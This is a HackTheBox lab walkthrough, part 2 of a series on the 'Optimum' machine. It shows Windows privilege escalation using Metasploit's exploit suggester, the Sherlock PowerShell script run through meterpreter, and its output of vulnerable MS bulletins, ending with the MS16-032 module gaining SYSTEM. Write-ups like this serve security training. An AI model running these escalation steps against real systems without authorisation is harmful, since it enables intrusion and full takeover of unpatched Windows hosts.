Optimum – HackTheBox Walkthrough – Part 2

Optimum – HackTheBox Walkthrough – Part 2

As we saw in the first part of this Optimum walkthrough, it is a beginner-level machine that is more of an enumeration of services with known exploits. These exploits are easy to work out and get the flag.

Let us continue from where we left.

As I had an issue with Windows-Exploit-Suggester I am using Metasploit to do privilege escalation.

msf6 exploit> use post/multi/recon/local_exploit_suggester

before using the post-exploitation, we have to know the session

then set the session in my case

>set SESSION 1


PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities: https://github.com/rasta-mouse/Sherlock/

We have to import the Sherlock script to Powershell to execute it.  DO NOT USE SHELL !! it won’t work. Use Powershell

meterpreter> powershell_import /home/kali/Downloads/Sherlock/Sherlock.ps1

meterpreter>powershell_execute Find-AllVulns

 Title      : User Mode to Ring (KiTrap0D)

MSBulletin : MS10-015

CVEID      : 2010-0232

Link       : https://www.exploit-db.com/exploits/11199/

VulnStatus : Not supported on 64-bit systems


Title      : Task Scheduler .XML

MSBulletin : MS10-092

CVEID      : 2010-3338, 2010-3888

Link       : https://www.exploit-db.com/exploits/19930/

VulnStatus : Not Vulnerable


Title      : NTUserMessageCall Win32k Kernel Pool Overflow

MSBulletin : MS13-053

CVEID      : 2013-1300

Link       : https://www.exploit-db.com/exploits/33213/

VulnStatus : Not supported on 64-bit systems


Title      : TrackPopupMenuEx Win32k NULL Page

MSBulletin : MS13-081

CVEID      : 2013-3881

Link       : https://www.exploit-db.com/exploits/31576/

VulnStatus : Not supported on 64-bit systems


Title      : TrackPopupMenu Win32k Null Pointer Dereference

MSBulletin : MS14-058

CVEID      : 2014-4113

Link       : https://www.exploit-db.com/exploits/35101/

VulnStatus : Not Vulnerable


Title      : ClientCopyImage Win32k

MSBulletin : MS15-051

CVEID      : 2015-1701, 2015-2433

Link       : https://www.exploit-db.com/exploits/37367/

VulnStatus : Not Vulnerable


Title      : Font Driver Buffer Overflow

MSBulletin : MS15-078

CVEID      : 2015-2426, 2015-2433

Link       : https://www.exploit-db.com/exploits/38222/

VulnStatus : Not Vulnerable


Title      : ‘mrxdav.sys’ WebDAV

MSBulletin : MS16-016

CVEID      : 2016-0051

Link       : https://www.exploit-db.com/exploits/40085/

VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle

MSBulletin : MS16-032

CVEID      : 2016-0099

Link       : https://www.exploit-db.com/exploits/39719/

VulnStatus : Appears Vulnerable


Title      : Windows Kernel-Mode Drivers EoP

MSBulletin : MS16-034

CVEID      : 2016-0093/94/95/96

Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?

VulnStatus : Appears Vulnerable


Title      : Win32k Elevation of Privilege

MSBulletin : MS16-135

CVEID      : 2016-7255

Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135

VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 – 6.10.3

MSBulletin : N/A

CVEID      : 2017-7199

Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html

VulnStatus : Not Vulnerable

There are only 3 exploits that seem to work MS16-135, MS16-032, MS16-034.

Out of three only MS-16-032 – This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2008-2012 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Now let’s see if the exploit is available in Metasploit

>search ms16-032

We got the exploit so now set the necessary options and don’t forget to set the session. Without setting the session the exploit will not work

EXPLOITED !!!  We got the session perfectly and after checking the id


Server username: NT AUTHORITY\SYSTEM

Now finally to get the flag we have to go to the administrator folder


We successfully pwned(owned) the system.

 You can also use this exploit https://www.exploit-db.com/exploits/41020/